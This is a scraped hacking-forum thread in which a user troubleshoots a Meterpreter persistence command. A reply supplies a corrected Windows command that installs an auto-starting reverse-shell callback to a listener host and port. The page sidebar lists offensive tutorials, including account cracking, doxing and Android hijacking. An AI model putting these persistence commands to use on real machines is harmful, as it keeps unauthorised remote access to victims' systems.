I am playing around with this tutorial and if I try this command run persistence -A -L /var/ -X 30 -p 4444 -r 10.601.37 it tells me x86/linux version of Meterpreter is not supported with this Script! and if I define -P with linux/meterpreter/reversetcp it still says the same thing. Am I doing something wrong?
Forum Thread: Meterpreter Persistence Issue
- Hot
- Active
-
Forum Thread: How to Track Who Is Sms Bombing Me . 4 Replies
3 wks ago -
Forum Thread: Removing Pay-as-You-Go Meter on Loan Phones. 1 Replies
1 mo ago -
Forum Thread: Hydra Syntax Issue Stops After 16 Attempts 3 Replies
1 mo ago -
Forum Thread: moab5.Sh Error While Running Metasploit 17 Replies
2 mo ago -
Forum Thread: Execute Reverse PHP Shell with Metasploit 1 Replies
3 mo ago -
Forum Thread: Install Metasploit Framework in Termux No Root Needed M-Wiz Tool 1 Replies
4 mo ago -
Forum Thread: Hack and Track People's Device Constantly Using TRAPE 35 Replies
4 mo ago -
Forum Thread: When My Kali Linux Finishes Installing (It Is Ready to Boot), and When I Try to Boot It All I Get Is a Black Screen. 8 Replies
5 mo ago -
Forum Thread: HACK ANDROID with KALI USING PORT FORWARDING(portmap.io) 12 Replies
6 mo ago -
Forum Thread: Hack Instagram Account Using BruteForce 208 Replies
6 mo ago -
Forum Thread: Metasploit reverse_tcp Handler Problem 47 Replies
8 mo ago -
Forum Thread: How to Train to Be an IT Security Professional (Ethical Hacker) 22 Replies
8 mo ago -
Metasploit Error: Handler Failed to Bind 41 Replies
8 mo ago -
Forum Thread: How to Hack Android Phone Using Same Wifi 21 Replies
9 mo ago -
How to: HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide] 177 Replies
9 mo ago -
How to: Crack Instagram Passwords Using Instainsane 36 Replies
9 mo ago -
Forum Thread: How to Hack an Android Device Remotely, to Gain Acces to Gmail, Facebook, Twitter and More 5 Replies
9 mo ago -
Forum Thread: How Many Hackers Have Played Watch_Dogs Game Before? 13 Replies
9 mo ago -
Forum Thread: How to Hack an Android Device with Only a Ip Adress 55 Replies
10 mo ago -
How to: Sign the APK File with Embedded Payload (The Ultimate Guide) 10 Replies
10 mo ago
-
How To: Find Vulnerable Webcams Across the Globe Using Shodan
-
How To: Dox Anyone
-
How To: Scan for Vulnerabilities on Any Website Using Nikto
-
How To: Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
-
How To: The Top 80+ Websites Available in the Tor Network
-
How To: Use SpiderFoot for OSINT Gathering
-
How To: Detect Script-Kiddie Wi-Fi Jamming with Wireshark
-
How To: Use Metasploit's Database to Stay Organized & Store Information While Hacking
-
The Hacks of Mr. Robot: How to Hide Data in Audio Files
-
How To: Crack Password-Protected Microsoft Office Files, Including Word Docs & Excel Spreadsheets
-
How To: Exploit EternalBlue on Windows Server with Metasploit
-
How To: Create Rainbow Tables for Hashing Algorithms Like MD5, SHA1 & NTLM
-
How To: Use SQL Injection to Run OS Commands & Get a Shell
-
How To: Brute-Force Nearly Any Website Login with Hatch
-
How To: Easily Detect CVEs with Nmap Scripts
-
How To: Brute-Force FTP Credentials & Get Server Access
-
How To: Exploit Shellshock on a Web Server Using Metasploit
-
How To: Find Passwords in Exposed Log Files with Google Dorks
-
How To: Use Metasploit's WMAP Module to Scan Web Applications for Common Vulnerabilities
-
Hack Like a Pro: Digital Forensics Using Kali, Part 2 (Acquiring a Hard Drive Image for Analysis)
2 Responses
It looks like you forget to add the –i switch that can indicate the time interval between each connection attempt before 30 also check the location you are using if it's correct or not.
If you are trying this on Windows use this code:
run persistence -A -L c:\\ -X -i 30 -p 4444 -r 10.601.37
From what I read here: https://security.stackexchange.com/questions/95100/is-there-an-equivalent-of-meterpreters-run-persistence-for-linux the persistence script is only for windows and not for Linux. It does give a way to run persistence on Linux though, maybe you could try to make a script to automatically do it on Linux :)
Cheers,
Washu
Share Your Thoughts